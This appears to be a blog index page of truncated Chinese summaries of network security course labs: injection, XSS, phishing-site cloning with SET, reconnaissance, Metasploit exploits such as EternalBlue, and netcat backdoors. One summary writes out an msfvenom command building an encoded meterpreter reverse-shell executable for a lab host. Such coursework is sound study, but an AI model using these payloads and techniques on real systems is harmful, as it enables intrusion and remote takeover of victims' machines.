摘要： 1.实践过程记录 1.字符串型注入。 2.整数型注入 3.注入语句查看其他内容 4.xss是一种漏洞，这种漏洞允许用户输入脚本并且浏览器提交的时候不加编码。这种东西是最为流行并且有害的web应用的问题。web应用上有一些“特权功能”是通过JavaScript来连接的，如果这种跳转机制没有被正确地保护 阅读全文

摘要： 1.实践内容 (1).Web前端HTML 能正常安装、启停Apache。理解HTML，理解表单，理解GET与POST方法,编写一个含有表单的HTML。 使用service apache2 start启动apache服务。 表单：即把前端数据传送到后台的东西。 get：输入参数会显示在浏览器网址那一栏 阅读全文

摘要： 1.实践目标 本实践的目标理解常用网络欺诈背后的原理，以提高防范意识，并提出具体防范方法。 2.实践内容 （1）简单应用SET工具建立冒名网站 （1分） apachectl start开启服务 server apache2 restart重启apache2侦听服务 apache服务测试 可正常，无问 阅读全文

摘要： 1.实践目标 掌握信息搜集的最基础技能与常用工具的使用方法。 2.实践内容 （1）各种搜索技巧的应用 https://www.exploit-db.com/收集各种应用软件的漏洞，如tomcat服务器存在的漏洞和版本 shodan,对物联网设备（如摄像头通过弱口令等其他方式）以及其他很多东西进行在线 阅读全文

摘要： 本实践目标是掌握metasploit的基本应用方式，重点常用的三种攻击方式的思路。具体需要完成： 总计：主动：ms17_010永恒之蓝（成功）； 浏览器：office_word_hta（成功）； 客户端：ms10_046_shortcut_icon_dllloader（成功）； ms15_020_s 阅读全文

摘要： 1.系统运行监控 （1）使用如计划任务，每隔一分钟记录自己的电脑有哪些程序在联网，连接的外部IP是哪里。运行一段时间并分析该文件，综述一下分析结果。目标就是找出所有连网的程序，连了哪里，大约干了什么(不抓包的情况下只能猜)，你觉得它这么干合适不。如果想进一步分析的，可以有针对性的抓包。 1.使用sc 阅读全文

摘要： 1. 实践内容 1.1 正确使用msf编码器 使用 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b ‘\x00’ LHOST=192.168.136.135 LPORT=5222 -f exe > c 阅读全文

摘要： Exp2 后门原理与实践 实验环境 win7ip地址为： 192.168.136.130 kali.ip地址为： 192.168.136.129 两台虚拟机可以ping通 实验步骤 1，使用netcat获取主机操作Shell，cron启动 （1）使用WIN7进行监听，kali反弹连接。WIN7中输入 阅读全文

摘要： Exp1 PC平台逆向破解 1，掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 NOP:空指令，作用就是直接跳到下一指令。机器码为：90。 JNE：判断0标志位，不等于0跳转。机器码为：75。 JE：判断0标志位，等于0跳转。机器码为：74。 JMP：无条件跳转。机器码为：eb。 阅读全文

摘要： Exp0 Kali安装 安装时没进行截图，只有最终结果。包含共享文件夹，拼音输入法，网络也能正常使用。 。 遇到的问题 安装时，安装程序提示找不到网卡。 我猜测应该是我的主机正在使用，程序无法检测到，因此直接跳过，继续安装，结束后无明显问题，正常上网。 其他问题如键盘鼠标动不了,只要安装时选择一个其 阅读全文